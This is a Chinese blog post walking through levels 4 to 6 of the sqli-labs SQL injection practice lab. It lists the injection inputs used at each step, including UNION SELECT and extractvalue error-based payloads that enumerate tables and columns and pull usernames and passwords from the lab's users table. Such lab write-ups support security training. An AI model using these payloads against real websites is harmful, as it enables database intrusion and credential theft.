sqli-lib4-6关教程

最新推荐文章于 2024-07-13 18:10:19 发布
最新推荐文章于 2024-07-13 18:10:19 发布
阅读量313 收藏 10
点赞数 3
文章标签: 数据库 sql 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_56109788/article/details/139189457
版权

SERIES-4

输入?id=1

image-20240525082820750

输入?id=2-1,说明该数据类型为字符型

image-20240525082845788

输入?id=1’

image-20240525083231069

输入?id=1",说明闭合符号为"

image-20240525082954586

输入?id=1")–+

image-20240525083342096

输入?id=1") order by 3–+

image-20240525083631326

输入?id=1") order by 4–+

image-20240525083653483

数据共三列,输入?id=-1") union select 1,2,3 --+

image-20240525084013918

回显位为2和3,输入?id=-1") union select 1,database(),version()–+查看当前数据库和数据库版本

image-20240525084346724

输入?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=‘security’–+查看当前数据库中的所有表

image-20240525084447901

输入?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name=‘users’–+查看user表中的所有列

image-20240525084539031

输入?id=-1") union select 1,2,group_concat(username ,id , password) from users–+查看user表中的字段

image-20240525084647168

SERIES-5

通过查看源码能成功执行的语句都会返回you are in错误则没有返回

输入?id=1

image-20240525084750556

输入?id=2-1,

image-20240525084813245

输入?id=1’,报错,说明数据类型为字符型,闭合符号位单引号

image-20240525084852557

输入?id=1",说明闭合符号为单引号

image-20240525084930121

由此我们能判断出可以使用布尔类型的返回,使用报错注入

首先查看所有库?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(schema_name),63,31) from information_schema.schemata),0x7e))) --+

image-20240525091206412

输入?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(table_name),1,31) from information_schema.tables where table_schema=database()),0x7e))) --+查看当前库里面的所有表

image-20240525091324064

输入?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(column_name),60,31) from information_schema.columns where table_schema=database()),0x7e))) --+查看users表里面的所有列

image-20240525091423424

输入?id=1’ and (extractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+查看用户名和密码

image-20240525091521769

SERIES-6

输入?id=1image-20240525091600881

输入?id=2-1,此时不能判断是什么数据类类型

image-20240525091701207

输入?id=1’,页面无报错

image-20240525091742135

输入?id=1",说明闭合符号为双引号

image-20240525091815613

利用报错注入

输入?id=1" and (extractvalue(1,concat(0x7e,(select substr(group_concat(table_name),1,31) from information_schema.tables where table_schema=database()),0x7e))) --+查看所有数据库

image-20240525091936542

输入?id=1" and (extractvalue(1,concat(0x7e,(select substr(group_concat(column_name),60,31) from information_schema.columns where table_schema=database()),0x7e))) --+查看users表里面的所有列

image-20240525092138224

输入?id=1" and (extractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+查看用户名和密码

ractvalue(1,concat(0x7e,(select substr(group_concat(username,password),1,31) from security.users),0x7e))) --+查看用户名和密码

image-20240525092209289

吃不饱的小胡
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sqli-lib64笔记学习资料.zip
08-22
《sqli-labs-1-65閫氬叧鏁欑▼share(by sm0nk).md》这个文件很可能包含了作者sm0nk在完成sqli-lib64所有65的过程中所记录的笔记和技巧。通过阅读这份文档,你可以了解到每个卡的键思路、解题方法以及可能遇到...
phpstudy+靶场sqli-labs-master下载
11-08
6. **Sqli-Labs实战**:熟悉靶场的结构,逐级破解每个级别的挑战,通过实践学习如何识别和利用SQL注入漏洞,以及如何防止此类攻击。 7. **安全编程**:学习如何在PHP中编写安全的代码,如使用预编译语句(PDO或...
sqli-lib靶场1-15教程
m0_56109788的博客
04-25 1158
sqli-lib靶场1-15教程
sqli-lib1-3教程
m0_56109788的博客
05-24 859
输入?id=1成功显示界面输入?id=2-1成功显示界面,但是页面发生改变,说明该数据类型为字符型加入单引号?id=2-1’,报错发现使用的单引号报错加上双引号?id=1",发现能够成功的显示,说明闭合符号为双引号。
sqli-labs通教程
m0_65150886的博客
01-23 1460
id=1返回正常页面?id=1'显示sql语句有误?id=1''页面返回正常,证明是字符型注入。因为该页面存在回显,所以我们可以使用联合查询。
sqli-labs通详解
m0_52051132的博客
10-15 6862
sqlmap.py -r ./xx.txt --batch --level 3 --tamper=“base64encode.py” --current-db 爆破表单。sqlmap.py -u ip --data=“uname=admin&passwd=admin” --batch -D security --tables 最后脱库。条件正确有回显,条件错误没有回显,布尔盲注?py -r 文件位置 -p 扫描位置 --batch -D security -T users --dump //脱库。
sqli-labs1-10心得与思路
m0_48294281的博客
03-08 6106
sqli-labs 1-11个人心得,欢迎交流指正。
sqli-labs部署及sqli-labs靶场
WE_zzs的博客
02-01 385
注:若在配置环境中无法启动mysql,应是和本地mysql冲突,需改端口号。1.下载phpstudy,并进入软件 打开nginx和mysql。并将其写入靶场配置文件中。(默认密码是root)4.选择sql-connerctions文件。5.在打开db-creds.inc文本。解压至phpstudy的www目录下。2.在启动和下载完成后将。输入127.0.0.1,
sqli-lab闯第5---第10
qq_54037445的博客
10-06 1751
sqli-lab闯,get类型,时间盲注,布尔盲注,报错注入,详细讲解
sqli-labs靶场第七
喜欢创作各种技术类文章,希望可以帮到你
01-28 335
id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合。id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错。
sqli-labs靶场(1-22
weixin_51566481的博客
08-16 7460
sqli-labs,sql注入,burpsuit
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
windows环境下安装sqli-labs
11-04
Windows 环境下安装 sqli-labs 详细教程 Windows Server 2012 环境下安装 sqli-labs 需要具备一定的基础知识和环境准备。在这里,我们将详细介绍如何在 Windows Server 2012 环境下安装 sqli-labs。 环境准备 在...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
set user & password for database 设置数据库 用户和密码
DavidsonGong的博客
07-12 139
USE sbms;
7.10飞书一面面经
东篱君的博客
07-10 1168
B+树的⾮叶⼦节点不存放实际的记录数据,仅存放索引,所以数据量相同的情况下,相⽐存储即存索引⼜存记录的 B 树,B+树的⾮叶⼦节点可以存放更多的索引,因此 B+ 树可以⽐ B 树更「矮胖」,查询底层节点的磁盘 I/O次数会更少。主从复制:单节点Redis的并发能力是有上限的,要进一步提高Redis的并发能力,可以搭建主从集群,实现读写分离。B+ 树有⼤量的冗余节点(所有⾮叶⼦节点都是冗余索引),这些冗余索引让 B+ 树在插⼊、删除的效率都更⾼,⽐如删除根节点的时候,不会像 B 树那样会发⽣复杂的树的变化;
Redis集群和高可用
最新发布
xiaogengtongxu的博客
07-13 327
主从架构无法实现master和slave角色的自动切换,即当master出现redis服务异常、主机断电、磁盘损坏等问题导致master无法使用,而redis主从复制无法实现自动的故障转移(将slave 自动提升为新master),需要手动修改环境配置,才能切换到slave redis服务器,另外当单台Redis服务器性能无法满足业务写入需求的时候,也无法横向扩展Redis服务的并行写入性能。master和slave角色的无缝切换,让业务无感知从而不影响业务使用。
mysql笔记1
m0_62975692的博客
07-11 344
首先查看systemctl status mysqld,如果是闭的可以进入的配置文件打开mysql,我的mysql配置文件就是在/usr/local/mysql/support-filess/下,在此目录下执行./mysql.server start,打开mysql服务,也可以通过systmectl start mysqld,如果你嫌麻烦的话可以systemctl enable mysqld 一直打开mysql的服务;重新给字段添加约束的时候不可以添加not null约束的!

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值